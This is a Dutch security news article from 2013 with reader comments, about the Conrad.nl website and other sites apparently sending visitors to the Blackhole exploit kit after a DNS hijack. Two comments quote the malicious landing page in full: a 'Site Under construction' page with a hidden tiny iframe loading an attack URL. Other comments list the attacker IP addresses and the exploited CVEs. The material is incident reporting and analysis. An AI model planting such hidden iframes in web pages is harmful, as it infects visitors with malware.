Nieuws
image

Conrad ontkent malware op website *update 2*

maandag 5 augustus 2013, 10:35 door Redactie, 18 reacties

Volgens verschillende beveiligingsonderzoekers zijn aanvallers erin geslaagd om malware op de website van elektronicawinkel Conrad te plaatsen, maar het bedrijf ontkent dit. Beveiligingsonderzoeker Yonathan Klijnsma liet vanochtend weten dat de frontpage van conrad.nl bezoekers naar de Blackhole exploit-kit doorstuurde. Deze exploit-kit infecteert bezoekers met onveilige software.

Het gaat dan om software zoals Adobe Reader, Java en Adobe Flash Player die niet door internetgebruikers zijn gepatcht. Ook beveiligingsbedrijf SurfRight bevestigt dat er malware op het domein aanwezig is.

De malware die via de website zou worden verspreidt wordt door 4 van de 45 virusscanners op VirusTotal herkend, zo laat de IT-beveiliger via Twitter weten. De malware zou vanaf de besmette computer een verbinding met het anonimiseringsnetwerk Tor opzetten, aldus Klijnsma, die voor Fox-IT werkt.

Reactie
Ook de website urlquery.net laat zien dat er malware via het domein wordt verspreid. Conrad ontkent echter dat website malware zou verspreiden. "@ydklijnsma Daar is geen sprake van. Er is een storing op DNS-server bij provider. Er wordt hard aan gewerkt om op te lossen."

Ook in een nieuwe tweet stelt de elektronicawinkel dat er een storing bij de provider is. Inmiddels zegt de website 'Site Under construction' en staat daar inderdaad een iframe die naar een aanvalspagina wijst.

Update 11:40
Het lijkt inderdaad om een DNS-probleem te gaan. Klijnsma meldt via Twitter dat de DNS van provider Webstekker is aangepast waardoor niet alleen het domein van Conrad, maar ook andere websites naar malware wijzen.

Update 2: 12:35
Conrad laat via Twitter weten dat het van de provider te horen kreeg dat het vannacht met een storing aan de DNS-omgeving te maken heeft gekregen. "Vannacht zijn aantal zones geüpdatet met verkeerde IP informatie. Vanochtend hersteld en SIDN heeft zones rond 08:00 uur geüpdatet. Correctie vond snel plaats maar effect niet overal snel zichtbaar. Kan soms enkele uren duren voor alle websites worden weergegeven."

Reacties (18)
05-08-2013, 10:53 door MI-10
- verwijderd.
05-08-2013, 11:13 door Anoniem
Misschien niet zo handig om naar dit soort berichten te plaatsen terwijl de malware nog op de betreffende site staat.
05-08-2013, 11:20 door Anoniem
Schijnbaar is niet alleen Conrad.nl 'besmet'

https://twitter.com/ydklijnsma/status/364305909092073473
05-08-2013, 12:12 door AcidBurn
Ik heb het net kunnen verifiëren. Het gaat om een verzoek naar de volgende pagina:
http://cona.com/removal/stops-followed-forces.php

De reactie van Conrad raakt kant noch wal. Het is geen storing en het lijkt niets te maken te hebben met DNS. Dan zou de hele website gekopieerd moeten zijn, want die krijg ik gewoon in beeld.
05-08-2013, 12:15 door AcidBurn
Sterker nog, het is zeker weten geen DNS probleem.

In de pagina staat een verwijzing:
<iframe src="//media.conrad.nl/survey/index.php?page=Homepage" frameborder="0" class="hideFrame"></iframe>

En die linkt vervolgens door naar de malware
<html>
<head>
<title>Site Under construction</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe src="http://cona.com/removal/stops-followed-forces.php" style="width:3px;height:3px;border:0px"></iframe>
</body>
</html>

Ik zie hier niet in terug hoe het met DNS te maken kan hebben. (tenzij heel media.conrad.nl verwijst naar een server die niet behoort te bestaan)
05-08-2013, 12:37 door MI-10
- verwijderd.
05-08-2013, 12:40 door Anoniem
Het ligt wel aan de DNS.
Ik weet welke server zij normaliter gebruiken. Nu gaat de DNS naar een server in Ierland.
05-08-2013, 12:54 door Whacko
Door AcidBurn: Sterker nog, het is zeker weten geen DNS probleem.

In de pagina staat een verwijzing:
<iframe src="//media.conrad.nl/survey/index.php?page=Homepage" frameborder="0" class="hideFrame"></iframe>

En die linkt vervolgens door naar de malware
<html>
<head>
<title>Site Under construction</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
</head>
<body>
<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<iframe src="http://cona.com/removal/stops-followed-forces.php" style="width:3px;height:3px;border:0px"></iframe>
</body>
</html>

Ik zie hier niet in terug hoe het met DNS te maken kan hebben. (tenzij heel media.conrad.nl verwijst naar een server die niet behoort te bestaan)

als de dns gehacked is, en media.conrad.nl wordt doorverwezen naar een malware site, dan kan dat toch? die iFrame zal er wel om een andere reden al in hebben gezeten. Aan de naam te zien, om af en toe een survey af tenemen bij bezoekers.
05-08-2013, 13:03 door Anoniem
Conrad heeft gelijk, er was bij alle providers die ns1.dn-s.nl en ns2.dn-s.nl als nameservers hebben een probleem. Op die servers was de zonefile voor dn-s.nl gehackt, waardoor ns-1.dn-s.nl en ns2.dn-s.nl verwezen naar een franse server met ip 178.33.22.5. Op die server draait een dns-server en en een webserver.
Die dns-server geeft voor alle queries (en dus alle domeinen die normaal in ns1.dn-s.nl staan) zijn eigen ip terug, zodat alle sites op de webserver op dit ip uitkomen. Die webserver geeft een lege pagina terug met als kop 'Website under construction', maar heeft een verborgen iframe die naar de exploit verwijst.

Omdat de 'valse' nameservers alle queries teruggaf met een TTL van 60000 of meer, kan het zomaar tot 20 uur duren voordat de verkeerde info uit de caches van andere nameservers zijn verdwenen en alles weer normaal is.
05-08-2013, 13:15 door Anoniem
Door AcidBurn: Sterker nog, het is zeker weten geen DNS probleem.

dus weten we nu in ieder geval dat AcidBurn het ook wel eens mis kan hebben. Tip: alleen "zeker weten" roepen als je het ook echt zeker weet :)
05-08-2013, 13:21 door Anoniem
De nameservers op dn-s.nl gaven enige tijd verkeerde informatie door. Zie ook https://twitter.com/ydklijnsma/status/364305909092073473

Peter
05-08-2013, 14:22 door Anoniem
Nope.
Meerdere bedrijven onder het it-ernity bedrijf hebben last van een 'dns storing'.

Die iframe is niet vriendelijk. Heb ik de helpdesk van vdx toch moeten wijzen op het feit dat het niet verstandig is om klanten naar de noc / update pagina te laten kijken voor de laatste updates, terwijl die host ook de "Site Under construction" iframe aan het serveren was...

Nou even kijken of ze (it-ernity dochters) zo open zijn om hier de juiste root cause te openbaren.
05-08-2013, 14:28 door Anoniem
Als je contact hebt gehad met 178.33.22.5, of 178.33.22.63 gehost in Frankrijk dan is er inderdaad kans dat je besmet bent met malware.

Ken iemand de werking nader toelichten? Ik heb onlangs één van de websites bezocht met de laatste versie van Firefox op Windows 7 x64, met de laatste flash player.

Zou ik ook slachtoffer van deze malware kunnen zijn?
05-08-2013, 15:09 door Anoniem
Door Anoniem: Ken iemand de werking nader toelichten? Ik heb onlangs één van de websites bezocht met de laatste versie van Firefox op Windows 7 x64, met de laatste flash player. Zou ik ook slachtoffer van deze malware kunnen zijn?
Als je een Adobe Acrobat/Reader op je pc had of een oude versie van Java dan ben je besmet geraakt, mits je een website heb bezocht waarvan de DNS door Webstekker, VDS of Digitalus werd beheerd. De aanval maakt specifiek gebruik van CVE-2012-0188 (Adobe Acrobat/Reader) en waarschijnlijk CVE-2013-2423 (Java runtime).
05-08-2013, 15:15 door MI-10
Zo te zien was mijn eerdere analyse onjuist. Het zou inderdaad een dns-hack geweest kunnen zijn.
De eerste reacties van mij zijn daarom verwijderd. Mijn excuses hiervoor.

Ik heb overigens wel de site bezocht, maar omdat standaard iFrames worden geblokkeerd (dan kan via NoScript in Firefox of ScriptSafe in Google webbrowser) is er - na controle - geen infectie opgetreden.
05-08-2013, 15:26 door MI-10
Door Anoniem: Als je contact hebt gehad met 178.33.22.5, of 178.33.22.63 gehost in Frankrijk dan is er inderdaad kans dat je besmet bent met malware.

Ken iemand de werking nader toelichten? Ik heb onlangs één van de websites bezocht met de laatste versie van Firefox op Windows 7 x64, met de laatste flash player.

Zou ik ook slachtoffer van deze malware kunnen zijn?
Check dat even via de gratis versie van HitmanPro http://www.surfright.nl/nl/downloads/
05-08-2013, 16:27 door Anoniem
"Misschien niet zo handig om naar dit soort berichten te plaatsen terwijl de malware nog op de betreffende site staat."

Hoezo ? Mensen met gezond verstand zullen op basis van zo'n bericht de website niet bezoeken. De vraag of je beschikt over gezond verstand is niet de verantwoordelijkheid van de redactie.

Op een website als www.security.nl zou je er toch vanuit moeten kunnen gaan dat mensen nadenken voordat ze een met malware besmette website bezoeken.

Ik heb dit soort artikelen *graag* hier, zodat ik op mijn werk deze website tijdelijk kan blokken op onze proxy. En ik zal niet de enige hier zijn die dergelijke informatie constructief gebruikt.

Mensen die zichzelf besmetten met malware door besmette websites bewust te bezoeken horen niet op security.nl thuis :)
05-08-2013, 16:50 door AcidBurn
Door Anoniem:
Door AcidBurn: Sterker nog, het is zeker weten geen DNS probleem.

dus weten we nu in ieder geval dat AcidBurn het ook wel eens mis kan hebben. Tip: alleen "zeker weten" roepen als je het ook echt zeker weet :)
Dan moet je in elk geval wel het hele bericht lezen voordat je bericht te roepen
Ik zie hier niet in terug hoe het met DNS te maken kan hebben. (tenzij heel media.conrad.nl verwijst naar een server die niet behoort te bestaan)
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.

Zoeken
search
Certified Secure